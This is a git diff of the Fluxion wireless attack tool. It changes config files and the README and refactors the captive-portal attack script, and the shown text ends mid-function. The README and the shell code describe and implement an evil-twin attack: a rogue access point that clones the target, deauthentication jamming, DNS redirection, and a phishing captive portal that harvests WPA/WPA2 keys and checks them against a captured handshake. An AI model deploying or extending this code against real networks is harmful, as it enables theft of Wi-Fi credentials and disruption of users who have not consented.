diff --git a/.editorconfig b/.editorconfig index 28ee5a7..0b79d02 100644 --- a/.editorconfig +++ b/.editorconfig @@ -6,13 +6,13 @@ insert_final_newline = true max_line_length=120 [*.sh] -indent_style = space -indent_size = 2 +indent_style = tab +indent_size = 4 charset = utf-8 trim_trailing_whitespace = true [*.py] -indent_size=2 +indent_size = 4 [*.md] trim_trailing_whitespace = false diff --git a/.gitignore b/.gitignore index e9168d9..57c0236 100644 --- a/.gitignore +++ b/.gitignore @@ -1,35 +1,173 @@ + +# Custom files *~ *.swp *.swo *.cap *.log -BullyOutput.txt +*.conf +*.lock +*.save +*.backup -# temporary files which can be created if a process still has a handle open of a deleted file -.fuse_hidden* +# Compiled Object files +*.slo +*.lo +*.o +*.obj -# KDE directory preferences -.directory +# Precompiled Headers +*.gch +*.pch -# Linux trash folder which might appear on any partition or disk -.Trash-* +# Compiled Dynamic libraries +*.so +*.dylib +*.dll -# .nfs files are created when an open file is removed but is still being accessed -.nfs* +# Fortran module files +*.mod +*.smod -# Cache files for Sublime Text +# Compiled Static libraries +*.lai +*.la +*.a +*.lib + +# Executables +*.exe +*.out +*.app + +### Calabash ### +# Calabash / Cucumber +rerun/ +reports/ +screenshots/ +screenshot*.png +test-servers/ + +# bundler +.bundle +vendor + +### Python ### +# Byte-compiled / optimized / DLL files +__pycache__/ +*.py[cod] +*$py.class + +# C extensions + +# Distribution / packaging +.Python +build/ +develop-eggs/ +dist/ +downloads/ +eggs/ +.eggs/ +lib/ +lib64/ +parts/ +sdist/ +var/ +wheels/ +*.egg-info/ +.installed.cfg +*.egg + +# PyInstaller +# Usually these files are written by a python script from a template +# before PyInstaller builds the exe, so as to inject date/other infos into it. +*.manifest +*.spec + +# Installer logs +pip-log.txt +pip-delete-this-directory.txt + +# Unit test / coverage reports +htmlcov/ +.tox/ +.coverage +.coverage.* +.cache +nosetests.xml +coverage.xml +*.cover +.hypothesis/ + +# Translations +*.mo +*.pot + +# Django stuff: +*.log +local_settings.py + +# Flask stuff: +instance/ +.webassets-cache + +# Scrapy stuff: +.scrapy + +# Sphinx documentation +docs/_build/ + +# PyBuilder +target/ + +# Jupyter Notebook +.ipynb_checkpoints + +# pyenv +.python-version + +# celery beat schedule file +celerybeat-schedule.* + +# SageMath parsed files +*.sage.py + +# Environments +.env +.venv +env/ +venv/ +ENV/ +env.bak/ +venv.bak/ + +# Spyder project settings +.spyderproject +.spyproject + +# Rope project settings +.ropeproject + +# mkdocs documentation +/site + +# mypy +.mypy_cache/ + +### SublimeText ### +# cache files for sublime text *.tmlanguage.cache *.tmPreferences.cache *.stTheme.cache -# Workspace files are user-specific +# workspace files are user-specific *.sublime-workspace -# Project files should be checked into the repository, unless a significant -# proportion of contributors will probably not be using Sublime Text +# project files should be checked into the repository, unless a significant +# proportion of contributors will probably not be using SublimeText # *.sublime-project -# SFTP configuration file +# sftp configuration file sftp-config.json # Package control specific files @@ -48,30 +186,22 @@ bh_unicode_properties.cache # https://packagecontrol.io/packages/sublime-github GitHub.sublime-settings -# General -*.DS_Store -.AppleDouble -.LSOverride +### Vim ### +# swap +.sw[a-p] +.*.sw[a-p] +# session +Session.vim +# temporary +.netrwhist +*~ +# auto-generated tag files +tags -# Icon must end with two \r -Icon - - -# Thumbnails -._* - -# Files that might appear in the root of a volume -.DocumentRevisions-V100 -.fseventsd -.Spotlight-V100 -.TemporaryItems -.Trashes -.VolumeIcon.icns -.com.apple.timemachine.donotpresent - -# Directories potentially created on remote AFP share -.AppleDB -.AppleDesktop -Network Trash Folder -Temporary Items -.apdisk +### VisualStudioCode ### +.vscode/* +!.vscode/settings.json +!.vscode/tasks.json +!.vscode/launch.json +!.vscode/extensions.json +.history \ No newline at end of file diff --git a/.gitmodules b/.gitmodules index da31889..b7adfeb 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,4 +1,3 @@ [submodule "attacks/Captive Portal/sites"] path = attacks/Captive Portal/sites - #url = git@github.com:FluxionNetwork/sites.git - url = https://github.com/FluxionNetwork/sites + url = https://github.com/FluxionNetwork/sites diff --git a/.project b/.project index a4206b7..6ab8b19 100644 --- a/.project +++ b/.project @@ -1,6 +1,6 @@ - fluxion + Fluxion diff --git a/README.md b/README.md index 1b23e3b..879df77 100644 --- a/README.md +++ b/README.md @@ -5,7 +5,7 @@ Fluxion is a security auditing and social-engineering research tool. It is a rem If you need quick help, fluxion is also avaible on gitter. You can talk with us [here](https://gitter.im/FluxionNetwork/Lobby) ## Installation -Read [this](https://github.com/FluxionNetwork/fluxion/wiki/Generate-ssh-keys) before you follow the following steps. +Read [here](https://github.com/FluxionNetwork/fluxion/wiki/Generate-ssh-keys) before you do the following steps.
**Download the latest revision** ``` @@ -22,10 +22,10 @@ cd fluxion ## :scroll: Changelog Fluxion gets weekly updates with new features, improvements, and bugfixes. -Be sure to check out the [changelog](https://github.com/FluxionNetwork/fluxion/commits/master). +Be sure to check out the [changelog here](https://github.com/FluxionNetwork/fluxion/commits/master). ## :octocat: How to contribute -All contributions are welcome! Code, documentation, graphics, and design suggestions are welcome; use GitHub to its fullest. Submit pull requests, contribute tutorials or other wiki content -- whatever you have to offer, it'll be appreciated but please follow the [style guide](https://github.com/FluxionNetwork/fluxion/wiki/Code-style-guide). +All contributions are welcome! Code, documentation, graphics, or even design suggestions are welcome; use GitHub to its fullest. Submit pull requests, contribute tutorials or other wiki content -- whatever you have to offer, it'll be appreciated but please follow the [style guide](https://github.com/FluxionNetwork/fluxion/wiki/Code-style-guide). ## :book: How it works * Scan for a target wireless network. @@ -35,7 +35,7 @@ All contributions are welcome! Code, documentation, graphics, and design suggest * Spawns a rogue (fake) AP, imitating the original access point. * Spawns a DNS server, redirecting all requests to the attacker's host running the captive portal. * Spawns a web server, serving the captive portal which prompts users for their WPA/WPA2 key. -* Spawns a jammer, deauthenticating all clients from original AP and luring them to the rogue AP. +* Spawns a jammer, deauthenticating all clients from original AP and lureing them to the rogue AP. * All authentication attempts at the captive portal are checked against the handshake file captured earlier. * The attack will automatically terminate once a correct key has been submitted. * The key will be logged and clients will be allowed to reconnect to the target access point. @@ -63,10 +63,10 @@ For development I use vim and tmux. Here are my [dotfiles](https://github.com/de ## Disclaimer * Authors do not own the logos under the `/attacks/Captive Portal/sites/` directory. Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. -* The usage of Fluxion to attack infrastructure without prior mutual consent could be considered an illegal activity, and is highly discouraged by its authors and developers. It is the end users responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program. +* The usage of Fluxion for attacking infrastructures without prior mutual consent could be considered an illegal activity, and is highly discouraged by its authors/developers. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program. ## Note -* :heavy_exclamation_mark: Beware of sites pretending to be related with the Fluxion Project. These may be delivering malware. +* Beware of sites pretending to be related with the Fluxion Project. These may be delivering malware. * Fluxion **DOES NOT WORK** on Linux Subsystem For Windows 10, because the subsystem doesn't allow access to network interfaces. Any Issue regarding the same would be **Closed Immediately** diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index 1f31b2f..b7636dc 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -1,307 +1,422 @@ #!/bin/bash -############################# < Captive Portal Parameters > ############################ +# ============================================================ # +# =============== < Captive Portal Parameters > ============== # +# ============================================================ # CaptivePortalState="Not Ready" CaptivePortalPassLog="$FLUXIONPath/attacks/Captive Portal/pwdlog" CaptivePortalNetLog="$FLUXIONPath/attacks/Captive Portal/netlog" -CaptivePortalJamTime="9999999999999" -CaptivePortalAuthenticationMethods=("hash") # "wpa_supplicant") -CaptivePortalAuthenticationMethodsInfo=("(handshake file, ${CGrn}recommended$CClr)") # "(Target AP authentication, slow)") +CaptivePortalAuthenticationMethods=("hash") # "wpa_supplicant") +CaptivePortalAuthenticationMethodsInfo=( + "(handshake file, ${CGrn}recommended$CClr)" +) # "(Target AP authentication, slow)") -########################### < Virtual Network Configuration > ########################## -# To avoid collapsing with an already connected network, we'll use an uncommon network. -VIGWAddress="192.168.254.1" -VIGWNetwork=${VIGWAddress%.*} +# ============= < Virtual Network Configuration > ============ # +# To avoid collapsing with an already existing network, +# we'll use a somewhat uncommon network and server IP. +CaptivePortalGatewayAddress="192.168.254.1" +CaptivePortalGatewayNetwork=${CaptivePortalGatewayAddress%.*} -function captive_portal_run_interface() { - if [ ! "$1" ]; then return 1; fi - # Create an identifier for the access point, AP virtual interface. - local wiAccessPoint="FX${1:2}AP" +# ============================================================ # +# ============== < Captive Portal Subroutines > ============== # +# ============================================================ # +captive_portal_unset_jammer_interface() { + if [ ! "$CaptivePortalJammerInterface" ]; then return 1; fi + CaptivePortalJammerInterface="" - # Find interface's physical device. - if ! interface_physical "$1"; then - echo -e "$FLUXIONVLine $FLUXIONPhysicalWIDeviceUnknownError" - sleep 5 - return 1 - fi + # Check if we're automatically selecting the interface & skip + # this one if so to take the user back properly. + local interfacesAvailable + readarray -t interfacesAvailable < <(attack_targetting_interfaces) - local wiAccessPointDevice="$InterfacePhysical" - - # Create the new virtual interface with the generated identifier. - echo -e "$FLUXIONVLine $CaptivePortalStartingInterfaceNotice" - if ! iw phy $wiAccessPointDevice interface add $wiAccessPoint type monitor 2>$FLUXIONOutputDevice; then - echo -e "$FLUXIONVLine $CaptivePortalCannotStartInterfaceError" - sleep 5 - return 3 - fi - - echo -e "$FLUXIONVLine $CaptivePortalStartedInterfaceNotice" - sleep 3 - - CaptivePortalRunInterface="$wiAccessPoint" + if [ ${#interfacesAvailable[@]} -le 1 ]; then return 2; fi } -function captive_portal_unset_interface() { - if [ ! "$WIAccessPoint" ]; then return 1; fi +captive_portal_set_jammer_interface() { + if [ "$CaptivePortalJammerInterface" ]; then return 0; fi - if interface_is_wireless "$WIAccessPoint"; then fluxion_unset_ap_service - fi - if [ "$WIAccessPoint" = "FX${WIMonitor:2}AP" ]; then - # Remove any previously created fluxion AP interfaces. - iw dev "$WIAccessPoint" del &>$FLUXIONOutputDevice - fi - - WIAccessPoint="" -} - -function captive_portal_set_interface() { - if [ "$WIAccessPoint" ]; then return 0; fi - - captive_portal_unset_interface - - # Gather candidate interfaces. - echo -e "$FLUXIONVLine $FLUXIONFindingWINotice" - - # List of all valid network interfaces. - interface_list_real - - local ifAlternate=("$FLUXIONGeneralRepeatOption" "$FLUXIONGeneralBackOption") - local ifAlternateInfo=("" "") - local ifAlternateState=("" "") - local ifAlternateColor=("$CClr" "$CClr") - - interface_prompt "$FLUXIONVLine $CaptivePortalInterfaceQuery" InterfaceListReal[@] \ - ifAlternate[@] ifAlternateInfo[@] ifAlternateState[@] ifAlternateColor[@] - - case "$InterfacePromptIfSelected" in - "$FLUXIONGeneralBackOption") - captive_portal_unset_interface - return 1 - ;; - - # If the monitor interface is also the AP interface, - # there's no need to reserve it again, just add it. - "$WIMonitor") - if ! captive_portal_run_interface "$InterfacePromptIfSelected"; then return 1 - fi - - WIAccessPoint="$CaptivePortalRunInterface" - ;; - *) - # We'll only attempt to run wireless interfaces for now. - # The conditional below is a temporary fix for ethernet interfaces. - # TODO: Fix fluxion_run_interface to accept non-wireless interfaces. - if interface_is_wireless "$InterfacePromptIfSelected"; then - if ! fluxion_run_interface "$InterfacePromptIfSelected"; then return 2 - fi - - WIAccessPoint="$FluxionRunInterface" - else - WIAccessPoint="$InterfacePromptIfSelected" - fi - ;; - esac - - VIGW=$WIAccessPoint - VIAP=$WIAccessPoint - - # Set an AP service if the interface selected is wireless. - if interface_is_wireless "$WIAccessPoint"; then - if ! fluxion_set_ap_service; then - captive_portal_unset_interface + if [ ! "$CaptivePortalUninitializedJammerInterface" ]; then + echo "Running get jammer interface." > $FLUXIONOutputDevice + if ! fluxion_get_interface attack_targetting_interfaces \ + "$CaptivePortalJammerInterfaceQuery"; then + echo "Failed to get jammer interface" > $FLUXIONOutputDevice return 1 fi + local selectedInterface=$FluxionInterfaceSelected + else + local selectedInterface=$CaptivePortalUninitializedJammerInterface + unset CaptivePortalUninitializedJammerInterface + fi + + if ! fluxion_allocate_interface $selectedInterface; then + echo "Failed to allocate jammer interface" > $FLUXIONOutputDevice + return 2 + fi + + echo "Succeeded get jammer interface." > $FLUXIONOutputDevice + CaptivePortalJammerInterface=${FluxionInterfaces[$selectedInterface]} +} + +captive_portal_ap_interfaces() { + interface_list_all + local interface + for interface in "${InterfaceListAll[@]}"; do + if [ "$interface" = "lo" ]; then continue; fi + echo "$interface" + done +} + +captive_portal_unset_ap_interface() { + if [ ! "$CaptivePortalAccessPointInterface" ]; then return 1; fi + if [ "$CaptivePortalAccessPointInterface" = \ + "${CaptivePortalJammerInterface}v" ]; then + if ! iw dev $CaptivePortalAccessPointInterface del \ + &> $FLUXIONOutputDevice; then + fluxion_conditional_bail "Unable to remove virtual interface!" + exit 1 + fi + fi + CaptivePortalAccessPointInterface="" +} + +captive_portal_set_ap_interface() { + if [ "$CaptivePortalAccessPointInterface" ]; then return 0; fi + + if [ ! "$CaptivePortalUninitializedAccessPointInterface" ]; then + echo "Running get ap interface." > $FLUXIONOutputDevice + if ! fluxion_get_interface captive_portal_ap_interfaces \ + "$CaptivePortalAccessPointInterfaceQuery"; then + echo "Failed to get ap interface" > $FLUXIONOutputDevice + return 1 + fi + local selectedInterface=$FluxionInterfaceSelected + else + local selectedInterface=$CaptivePortalUninitializedAccessPointInterface + unset CaptivePortalUninitializedAccessPointInterface + fi + + if ! fluxion_allocate_interface $selectedInterface; then + echo "Failed to allocate ap interface" > $FLUXIONOutputDevice + return 2 + fi + + echo "Succeeded get ap interface." > $FLUXIONOutputDevice + CaptivePortalAccessPointInterface=${FluxionInterfaces[$selectedInterface]} + + # If interfaces are the same, we need an independent virtual interface. + if [ "$CaptivePortalAccessPointInterface" = \ + "$CaptivePortalJammerInterface" ]; then + # TODO: Make fluxion's interface services manage virtual interfaces. + # Have fluxion_get_interface return a virutal interface if the primary + # interface is in used by something else (virtual reservation?). + echo "Virtual interface required, attempting." > $FLUXIONOutputDevice + if ! iw dev $CaptivePortalJammerInterface interface \ + add ${CaptivePortalJammerInterface}v type monitor \ + 2> $FLUXIONOutputDevice; then + echo -e "$FLUXIONVLine $CaptivePortalCannotStartInterfaceError" + sleep 5 + return 2 + fi + echo "Virtual interface created successfully." > $FLUXIONOutputDevice + CaptivePortalAccessPointInterface=${CaptivePortalJammerInterface}v fi } -function captive_portal_unset_auth() { - if [ ! "$APRogueAuthMode" ]; then return 0; fi +function captive_portal_unset_ap_service() { + if [ ! "$CaptivePortalAPService" ]; then return 1; fi - case "$APRogueAuthMode" in - "hash") fluxion_unset_hash ;; + CaptivePortalAPService="" + + # Since we're auto-selecting when on auto, trigger undo-chain. + if [ "$FLUXIONAuto" ]; then return 2; fi + + if ! interface_is_wireless "$CaptivePortalAccessPointInterface"; then + return 3; + fi +} + +function captive_portal_set_ap_service() { + if [ "$CaptivePortalAPService" ]; then return 0; fi + if ! interface_is_wireless "$CaptivePortalAccessPointInterface"; then + return 0; + fi + + captive_portal_unset_ap_service + + if [ "$FLUXIONAuto" ]; then + CaptivePortalAPService="hostapd" + else + fluxion_header + + echo -e "$FLUXIONVLine $CaptivePortalAPServiceQuery" + echo + + fluxion_target_show + + local choices=( + "$CaptivePortalAPServiceHostapdOption" + "$CaptivePortalAPServiceAirbaseOption" + "$FLUXIONGeneralBackOption" + ) + io_query_choice "" choices[@] + + echo + + case "$IOQueryChoice" in + "$CaptivePortalAPServiceHostapdOption") + CaptivePortalAPService="hostapd" ;; + "$CaptivePortalAPServiceAirbaseOption") + CaptivePortalAPService="airbase-ng" ;; + "$FLUXIONGeneralBackOption") + return 1 + ;; + *) + fluxion_conditional_bail "Invalid AP service selected!" + return 1 + ;; + esac + fi + + # AP Service: Load the service's helper routines. + source "lib/ap/$CaptivePortalAPService.sh" +} + +captive_portal_unset_authenticator() { + if [ ! "$CaptivePortalAuthenticatorMode" ]; then return 0; fi + + case "$CaptivePortalAuthenticatorMode" in + "hash") + echo "Unset hash is done automatically." > $FLUXIONOutputDevice ;; esac - APRogueAuthMode="" + CaptivePortalAuthenticatorMode="" # If we've only got one option, then the user skipped this section # by auto-selecting that single option, so we unset the previous # phase along with this one to properly take the user back. if [ ${#CaptivePortalAuthenticationMethods[@]} -le 1 ]; then - captive_portal_unset_interface + return 1 # Trigger undo chain because it was auto-selected. fi } -function captive_portal_set_auth() { - if [ "$APRogueAuthMode" ]; then - echo "Captive Portal authentication mode is already set, skipping!" >$FLUXIONOutputDevice +captive_portal_set_authenticator() { + if [ "$CaptivePortalAuthenticatorMode" ]; then + echo "Captive Portal authentication mode is already set, skipping!" \ + > $FLUXIONOutputDevice return 0 fi - captive_portal_unset_auth + captive_portal_unset_authenticator # If we've got only one choice, auto-select it for the user. - if [ ${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \ - ${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a "$FLUXIONAuto" ]; then - APRogueAuthMode="${CaptivePortalAuthenticationMethods[0]}" - echo "Auto-selected authentication method: $APRogueAuthMode" >$FLUXIONOutputDevice + if [ \ + ${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \ + ${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a \ + "$FLUXIONAuto" ]; then + CaptivePortalAuthenticatorMode="${CaptivePortalAuthenticationMethods[0]}" + echo "Auto-selected auth-method: $CaptivePortalAuthenticatorMode" \ + > $FLUXIONOutputDevice else fluxion_header echo -e "$FLUXIONVLine $CaptivePortalVerificationMethodQuery" echo - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" + fluxion_target_show - local choices=("${CaptivePortalAuthenticationMethods[@]}" "$FLUXIONGeneralBackOption") - io_query_format_fields "" "\t$CRed[$CYel%d$CRed]$CClr %b %b\n" choices[@] \ - CaptivePortalAuthenticationMethodsInfo[@] + local choices=( + "${CaptivePortalAuthenticationMethods[@]}" + "$FLUXIONGeneralBackOption" + ) + io_query_format_fields "" "\t$CRed[$CYel%d$CRed]$CClr %b %b\n" \ + choices[@] CaptivePortalAuthenticationMethodsInfo[@] echo - APRogueAuthMode="${IOQueryFormatFields[0]}" + CaptivePortalAuthenticatorMode="${IOQueryFormatFields[0]}" # If we're going back, reset everything and abort. - if [[ "$APRogueAuthMode" == "$FLUXIONGeneralBackOption" ]]; then - captive_portal_unset_auth - return 1 + if [[ \ + "$CaptivePortalAuthenticatorMode" == \ + "$FLUXIONGeneralBackOption" ]]; then + captive_portal_unset_authenticator + return -1 fi fi # Process the authentication method selected. - captive_portal_set_auth_processingResult=1 # Assume failure. - case "$APRogueAuthMode" in - "hash") - fluxion_set_hash - captive_portal_set_auth_processingResult=$? - ;; + local result=1 # Assume failure at first. + case "$CaptivePortalAuthenticatorMode" in + "hash") + # Pass default path if no path is set yet. + if [ ! "$CaptivePortalHashPath" ]; then + CaptivePortalHashPath="$FLUXIONPath/attacks/Handshake Snooper/handshakes/$FluxionTargetSSIDClean-$FluxionTargetMAC.cap" + fi + + fluxion_hash_get_path \ + "$CaptivePortalHashPath" "$FluxionTargetMAC" "$FluxionTargetSSID" + result=$? + + if [ $result -eq 0 ]; then + CaptivePortalHashPath="$FluxionHashPath" + fi + ;; esac - # Assure authentication method processing was successful, abort otherwise. - if [[ $captive_portal_set_auth_processingResult -ne 0 ]]; then - captive_portal_unset_auth + # Assure authentication method processing succeeded, abort otherwise. + if [[ $result -ne 0 ]]; then + echo "Auth-mode error code $result!" > $FLUXIONOutputPath return 1 fi } -function captive_portal_run_certificate_generator() { - xterm -bg "#000000" -fg "#CCCCCC" -title "Generating Self-Signed SSL Certificate" -e openssl req -subj '/CN=captive.router.lan/O=CaptivePortal/OU=Networking/C=US' -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout "$FLUXIONWorkspacePath/server.pem" -out "$FLUXIONWorkspacePath/server.pem" # more details there https://www.openssl.org/docs/manmaster/apps/openssl.html +captive_portal_run_certificate_generator() { + xterm -bg "#000000" -fg "#CCCCCC" \ + -title "Generating Self-Signed SSL Certificate" -e openssl req \ + -subj '/CN=captive.router.lan/O=CaptivePortal/OU=Networking/C=US' \ + -new -newkey rsa:2048 -days 365 -nodes -x509 \ + -keyout "$FLUXIONWorkspacePath/server.pem" \ + -out "$FLUXIONWorkspacePath/server.pem" + # Details -> https://www.openssl.org/docs/manmaster/apps/openssl.html chmod 400 "$FLUXIONWorkspacePath/server.pem" } -function captive_portal_unset_cert() { +captive_portal_unset_certificate() { + if [ ! "$CaptivePortalSSL" ]; then return 1; fi + # WARNING: The server configuration depends on whether the certificate + # file exists and is positioned in the proper location. The check above + # could unsynchronize with the certificate file if we're not careful! sandbox_remove_workfile "$FLUXIONWorkspacePath/server.pem" CaptivePortalSSL="" + + # Since we're auto-selecting when on auto, trigger undo-chain. + if [ "$FLUXIONAuto" ]; then return 2; fi } # Create Self-Signed SSL Certificate -function captive_portal_set_cert() { +captive_portal_set_certificate() { if [ "$CaptivePortalSSL" ]; then - echo "Captive Portal SSL mode already set to $CaptivePortalSSL!" >$FLUXIONOutputDevice + echo "Captive Portal SSL mode already set to $CaptivePortalSSL!" \ + > $FLUXIONOutputDevice return 0 fi - captive_portal_unset_cert + captive_portal_unset_certificate - # Check for existance of ssl certificate within fluxion with file size > 0 - # If a certificate exists, it's user supplied (fancy), copy it to fluxspace. - if [ -f "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" -a \ - -s "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" ]; then + # Check existance of ssl certificate within fluxion with file size > 0 + # If user-supplied (fancy) certificate exists, copy it to fluxspace. + if [ \ + -f "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" -a \ + -s "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" \ + ]; then cp "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" \ "$FLUXIONWorkspacePath/server.pem" - CaptivePortalSSL="enabled" # Must be enabled if sourcing own certificate + CaptivePortalSSL="enabled" # Enabled if sourcing user certificate - echo "Captive Portal certificate was user supplied, skipping query!" >$FLUXIONOutputDevice + echo "Captive Portal certificate was user supplied, skipping query!" \ + > $FLUXIONOutputDevice return 0 fi if [ "$FLUXIONAuto" ]; then - # If cert generator fails, gtfo, something broke! - if ! captive_portal_run_certificate_generator; then - fluxion_conditional_bail "cert-gen failed!" - return 2 - fi - CaptivePortalSSL="enabled" + CaptivePortalSSL="disabled" else - local choices=("$CaptivePortalCertificateSourceGenerateOption" "$CaptivePortalCertificateSourceRescanOption" "$CaptivePortalCertificateSourceDisabledOption" "$FLUXIONGeneralBackOption") + local choices=( + "$CaptivePortalCertificateSourceGenerateOption" + "$CaptivePortalCertificateSourceRescanOption" + "$CaptivePortalCertificateSourceDisabledOption" + "$FLUXIONGeneralBackOption" + ) io_query_choice "$CaptivePortalCertificateSourceQuery" choices[@] echo case "$IOQueryChoice" in - "$CaptivePortalCertificateSourceGenerateOption") - # If cert generator fails, gtfo, something broke! - if ! captive_portal_run_certificate_generator; then - fluxion_conditional_bail "cert-gen failed!" + "$CaptivePortalCertificateSourceGenerateOption") + # If cert generator fails, gtfo, something broke! + if ! captive_portal_run_certificate_generator; then + fluxion_conditional_bail "cert-gen failed!" + return 2 + fi + CaptivePortalSSL="enabled" + ;; + + "$CaptivePortalCertificateSourceRescanOption") + captive_portal_set_certificate + return $? + ;; + + "$CaptivePortalCertificateSourceDisabledOption") + CaptivePortalSSL="disabled" + ;; + + "$FLUXIONGeneralBackOption") + return 1 + ;; + *) + fluxion_conditional_bail "Unknown cert-gen option!" return 2 - fi - CaptivePortalSSL="enabled" - ;; - - "$CaptivePortalCertificateSourceRescanOption") - captive_portal_set_cert - return $? - ;; - - "$CaptivePortalCertificateSourceDisabledOption") - captive_portal_unset_cert - CaptivePortalSSL="disabled" - ;; - - "$FLUXIONGeneralBackOption") - captive_portal_unset_cert - return 1 - ;; - *) - fluxion_conditional_bail "Unknown cert-gen option!" - return 2 - ;; + ;; esac fi } -function captive_portal_unset_conn() { +captive_portal_unset_connectivity() { + if [ ! "$CaptivePortalConnectivity" ]; then return 1; fi CaptivePortalConnectivity="" + + # Since we're auto-selecting when on auto, trigger undo-chain. + if [ "$FLUXIONAuto" ]; then return 2; fi } -function captive_portal_set_conn() { +captive_portal_set_connectivity() { if [ "$CaptivePortalConnectivity" ]; then return 0; fi - captive_portal_unset_conn + captive_portal_unset_connectivity - local choices=("$CaptivePortalConnectivityDisconnectedOption" "$CaptivePortalConnectivityEmulatedOption" "$FLUXIONGeneralBackOption") - io_query_choice "$CaptivePortalConnectivityQuery" choices[@] + if [ "$FLUXIONAuto" ]; then + CaptivePortalConnectivity="disconnected" + else + local choices=( + "$CaptivePortalConnectivityDisconnectedOption" + "$CaptivePortalConnectivityEmulatedOption" + "$FLUXIONGeneralBackOption" + ) + io_query_choice "$CaptivePortalConnectivityQuery" choices[@] - case "$IOQueryChoice" in - "$CaptivePortalConnectivityDisconnectedOption") CaptivePortalConnectivity="disconnected" ;; - "$CaptivePortalConnectivityEmulatedOption") CaptivePortalConnectivity="emulated" ;; - "$FLUXIONGeneralBackOption") - captive_portal_unset_conn - return 1 - ;; - *) - fluxion_conditional_bail "Unknown connectivity option!" - return 2 - ;; - esac -} - -function captive_portal_unset_site() { - sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal" -} - -function captive_portal_set_site() { - if [ -d "$FLUXIONWorkspacePath/captive_portal" ]; then - echo "Captive Portal site (interface) is already set, skipping!" >$FLUXIONOutputDevice - return 0 + case "$IOQueryChoice" in + "$CaptivePortalConnectivityDisconnectedOption") + CaptivePortalConnectivity="disconnected" ;; + "$CaptivePortalConnectivityEmulatedOption") + CaptivePortalConnectivity="emulated" ;; + "$FLUXIONGeneralBackOption") + return 1 + ;; + *) + fluxion_conditional_bail "Unknown connectivity option!" + return 2 + ;; + esac fi +} - captive_portal_unset_site +captive_portal_unset_user_interface() { + if [ -z "$CaptivePortalUserInterface" -o \ + ! -d "$FLUXIONPath/attacks/Captive Portal/sites/$CaptivePortalUserInterface.portal" ]; then return 1; fi + CaptivePortalUserInterface="" +} + +captive_portal_set_user_interface() { + if [ "$CaptivePortalUserInterface" != "" -a \ + -d "$FLUXIONPath/attacks/Captive Portal/sites/$CaptivePortalUserInterface.portal" ]; then return 0; fi + + captive_portal_unset_user_interface local sites=() @@ -334,7 +449,8 @@ function captive_portal_set_site() { echo - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" + fluxion_target_show "$FluxionTargetSSID" "$FluxionTargetEncryption" \ + "$FluxionTargetChannel" "$FluxionTargetMAC" "$FluxionTargetMaker" io_query_format_fields "" "$queryFieldOptionsFormat\n" \ sitesIdentifier[@] sitesLanguage[@] @@ -346,39 +462,27 @@ function captive_portal_set_site() { local sitePath="${site}_${siteLanguage}" case "$site" in - "$CaptivePortalGenericInterfaceOption") - source "$FLUXIONPath/attacks/Captive Portal/generic/languages/$siteLanguage.lang" - captive_portal_generic - ;; - "$FLUXIONGeneralBackOption") - captive_portal_unset_site - return 1 - ;; - *) - cp -r "$FLUXIONPath/attacks/Captive Portal/sites/$sitePath.portal" \ - "$FLUXIONWorkspacePath/captive_portal" - - find "$FLUXIONWorkspacePath/captive_portal/" -type f -exec sed -i -e 's/$APTargetSSID/'"${APTargetSSID//\//\\\/}"'/g; s/$APTargetMAC/'"${APTargetMAC//\//\\\/}"'/g; s/$APTargetChannel/'"${APTargetChannel//\//\\\/}"'/g' {} \; - ;; + "$CaptivePortalGenericInterfaceOption") + source "$FLUXIONPath/attacks/Captive Portal/generic/languages/$siteLanguage.lang" + captive_portal_generic + ;; + "$FLUXIONGeneralBackOption") + captive_portal_unset_user_interface + return 1 + ;; + *) + CaptivePortalUserInterface=$sitePath + ;; esac } -function captive_portal_unset_attack() { - sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - sandbox_remove_workfile "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" - sandbox_remove_workfile "$FLUXIONWorkspacePath/lighttpd.conf" - sandbox_remove_workfile "$FLUXIONWorkspacePath/dhcpd.leases" - sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal/check.php" - sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal" - # Only reset the AP if one has been defined. - if [ "$APRogueService" -a "$(type -t ap_reset)" ]; then ap_reset - fi -} - -function captive_portal_get_client_IP() { - if [ -f "$CaptivePortalPassLog/$APTargetSSIDClean-$APTargetMAC-IP.log" ]; then - MatchedClientIP=$(cat "$CaptivePortalPassLog/$APTargetSSIDClean-$APTargetMAC-IP.log" | sed '/^\s*$/d' | tail -n 1 | head -n 1) +captive_portal_get_client_IP() { + if [ -f "$CaptivePortalPassLog/$FluxionTargetSSIDClean-$FluxionTargetMAC-IP.log" ]; then + MatchedClientIP=$( + cat "$CaptivePortalPassLog/$FluxionTargetSSIDClean-$FluxionTargetMAC-IP.log" | \ + sed '/^\s*$/d' | tail -n 1 | head -n 1 + ) else MatchedClientIP="unknown" fi @@ -386,38 +490,66 @@ function captive_portal_get_client_IP() { echo $MatchedClientIP } -function captive_portal_get_IP_MAC() { - if [ -f "$CaptivePortalPassLog/$APTargetSSIDClean-$APTargetMAC-IP.log" ] && [ "$(captive_portal_get_client_IP)" != "" ] && [ -f "$FLUXIONWorkspacePath/clients.txt" ]; then - IP=$(captive_portal_get_client_IP) - MatchedClientMAC=$(cat $FLUXIONWorkspacePath/clients.txt | grep 